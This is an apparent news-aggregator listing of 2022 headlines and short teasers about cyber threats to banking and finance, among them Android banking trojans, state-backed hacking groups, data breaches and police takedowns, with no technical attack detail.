Banking and Finance


  • Huge network of 11,000 fake investment sites targets Europe

    July 31, 2022

    Researchers have uncovered a gigantic network of more than 11,000 domains used to promote numerous fake investment schemes to users in Europe. The platforms show fabricated evidence of enrichment and falsified celebrity endorsements to create an image of legitimacy and lure in a larger number of victims. The goal of the operation is to trick users into ...

  • Weak data protection helped China attack US Federal Reserve, report says

    July 27, 2022

    China’s cyber espionage activities are extensive and sophisticated but when the Middle Kingdom tried to steal sensitive economic data from the US Fed, poor security meant its operatives didn’t have to dip too far into their bags of tricks. Or at least that’s according to the findings of an investigation by the Senate’s Committee on Homeland ...

  • Evilnum hackers return in new operation targeting migration orgs

    June 28, 2022

    The Evilnum hacking group is showing renewed signs of malicious activity, targeting European organizations that are involved in international migration. Evilnum is an APT (advanced persistent threat) that has been active since at least 2018 and had its campaign and tools exposed only recently, in 2020. At that time, ESET published a technical report describing the threat ...

  • Europol: Phishing gang behind several million euros worth of losses busted in Belgium and the Netherlands

    June 21, 2022

    A cross-border operation, supported by Europol and involving the Belgian Police (Police Fédérale/Federale Politie) and the Dutch Police (Politie), resulted in the dismantling of an organised crime group involved in phishing, fraud, scams and money laundering. The action day on 21 June 2022 led to: 9 arrests in the Netherlands 24 house searches in the NetherlandsSeizures including firearms, ...

  • 1.5 million customers impacted by Flagstar Bank data breach

    June 21, 2022

    Flagstar Bank has disclosed a security incident that led to the exposure of personal data belonging to up to 1.5 million customers. As reported by Bleeping Computer, the data breach occurred between December 3 and December 4, 2021. The US financial organization is headquartered in Michigan and operates over 150 branches in areas including Indiana, California, Wisconsin, ...

  • Android-wiping BRATA malware is evolving into a persistent threat

    June 19, 2022

    The threat actor behind BRATA banking trojan has evolved their tactics and improved the malware with information-stealing capabilities. Italian mobile security company Cleafy has been tracking BRATA activity and noticed in the most recent campaigns changes that lead to longer persistence on the device. “The modus operandi now fits into an Advanced Persistent Threat (APT) activity pattern,” ...

  • GALLIUM Expands Targeting Across Telecommunications, Government and Finance Sectors With New PingPull Tool

    June 13, 2022

    Over the past year, this group has extended its targeting beyond telecommunication companies to also include financial institutions and government entities. During this period, we have identified several connections between GALLIUM infrastructure and targeted entities across Afghanistan, Australia, Belgium, Cambodia, Malaysia, Mozambique, the Philippines, Russia and Vietnam. Most importantly, we have also identified the group’s ...

  • Exposing POLONIUM activity and infrastructure targeting Israeli organizations

    June 2, 2022

    Microsoft successfully detected and disabled attack activity abusing OneDrive by a previously undocumented Lebanon-based activity group Microsoft Threat Intelligence Center (MSTIC) tracks as POLONIUM. The associated indicators and tactics were used by the OneDrive team to improve detection of attack activity and disable offending actor accounts. To further address this abuse, Microsoft has suspended more ...

  • New ERMAC 2.0 Android malware steals accounts, wallets from 467 apps

    May 26, 2022

    The ERMAC Android banking trojan has released version 2.0, increasing the number of applications targeted from 378 to 467, covering a much wider range of apps to steal account credentials and crypto wallets. The goal of the trojan is to send stolen login credentials to threat actors, who then use them to take control of other ...

  • FBI: Cyber Actors Scrape Credit Card Data from US Business’ Online Checkout Page and Maintain Persistence by Injecting Malicious PHP Code

    May 16, 2022

    As of January 2022, unidentified cyber actors unlawfully scraped credit card data from a US business by injecting malicious PHP Hypertext Preprocessor (PHP) code into the business’ online checkout page and sending the scraped data to an actor-controlled server that spoofed a legitimate card processing server. The unidentified cyber actors also established backdoor access to the ...

  • UK Government hackers made hundreds of thousands of stolen credit cards ‘worthless’ to crooks

    May 10, 2022

    A joint operation involving intelligence agency GCHQ and the Ministry of Defence took direct action against computer networks used by cyber criminals, helping to protect people against cyberattacks and also making hundreds of thousands of stolen credit cards worthless to the crooks who stole them. The action by the National Cyber Force – using the combined ...

  • TraderTraitor: North Korean State-Sponsored APT Targets Blockchain Companies

    April 18, 2022

    The Federal Bureau of Investigation (FBI), the Cybersecurity and Infrastructure Security Agency (CISA), and the U.S. Treasury Department (Treasury) are issuing this joint Cybersecurity Advisory (CSA) to highlight the cyber threat associated with cryptocurrency thefts and tactics used by a North Korean state-sponsored advanced persistent threat (APT) group since at least 2020. This group is commonly ...

  • Android banking malware intercepts calls to customer support

    April 11, 2022

    A banking trojan for Android that researchers call Fakecalls comes with a powerful capability that enables it to take over calls to a bank’s customer support number and connect the victim directly with the cybercriminals operating the malware. Disguised as a mobile app from a popular bank, Fakecalls displays all the marks of the entity it ...

  • New Android banking malware remotely takes control of your device

    April 9, 2022

    A new Android banking malware named Octo has appeared in the wild, featuring remote access capabilities that allow malicious operators to perform on-device fraud. Octo is an evolved Android malware based on ExoCompact, a malware variant based on the Exo trojan that quit the cybercrime space and had its source code leaked in 2018. The new variant ...

  • Bank had no firewall license, intrusion or phishing protection – guess the rest

    April 5, 2022

    An Indian bank that did not have a valid firewall license, had not employed phishing protection, lacked an intrusion detection system and eschewed use of any intrusion prevention system has, shockingly, been compromised by criminals who made off with millions of rupees. The unfortunate institution is called the Andra Pradesh Mahesh Co-Operative Urban Bank. Its 45 ...

  • Lazarus Trojanized DeFi app for delivering malware

    March 31, 2022

    For the Lazarus threat actor, financial gain is one of the prime motivations, with a particular emphasis on the cryptocurrency business. As the price of cryptocurrency surges, and the popularity of non-fungible token (NFT) and decentralized finance (DeFi) businesses continues to swell, the Lazarus group’s targeting of the financial industry keeps evolving. We recently discovered a ...

  • Exotic Lily: Exposing initial access broker with ties to Conti

    March 18, 2022

    In early September 2021, Threat Analysis Group (TAG) observed a financially motivated threat actor we refer to as EXOTIC LILY, exploiting a 0day in Microsoft MSHTML (CVE-2021-40444). Investigating this group’s activity, we determined they are an Initial Access Broker (IAB) who appear to be working with the Russian cyber crime gang known as FIN12 (Mandiant, ...

  • BNP Paribas bars Russia-based staff from computer systems as cyber attack fears grow

    March 10, 2022

    France’s largest bank BNP Paribas has cut off its Russia-based workforce from its internal computer systems as it seeks to bolster its defences against any potential cyber attack, a source with direct knowledge of the matter told Reuters. The French lender, believed to be the first major bank to have jettisoned staff in Moscow from its ...

  • SharkBot malware hides as Android antivirus in Google Play

    March 5, 2022

    SharkBot banking malware has infiltrated the Google Play Store, the official Android app repository, posing as an antivirus with system cleaning capabilities. Although the trojan app was far from popular, its presence in Play Store shows that malware distributors can still bypass Google’s automatic defenses. The app is still present in Google’s store at the moment ...

  • TeaBot Android Banking Trojan continues its global conquest with new upgrades

    March 2, 2022

    The TeaBot Remote Access Trojan (RAT) has been upgraded, leading to a huge increase in both targets and spread worldwide. On March 1, the Cleafy research team said TeaBot now targets over 400 applications, pivoting from an earlier focus on “smishing” to more advanced tactics. Smishing attacks are used to compromise mobile handsets via spam text messages ...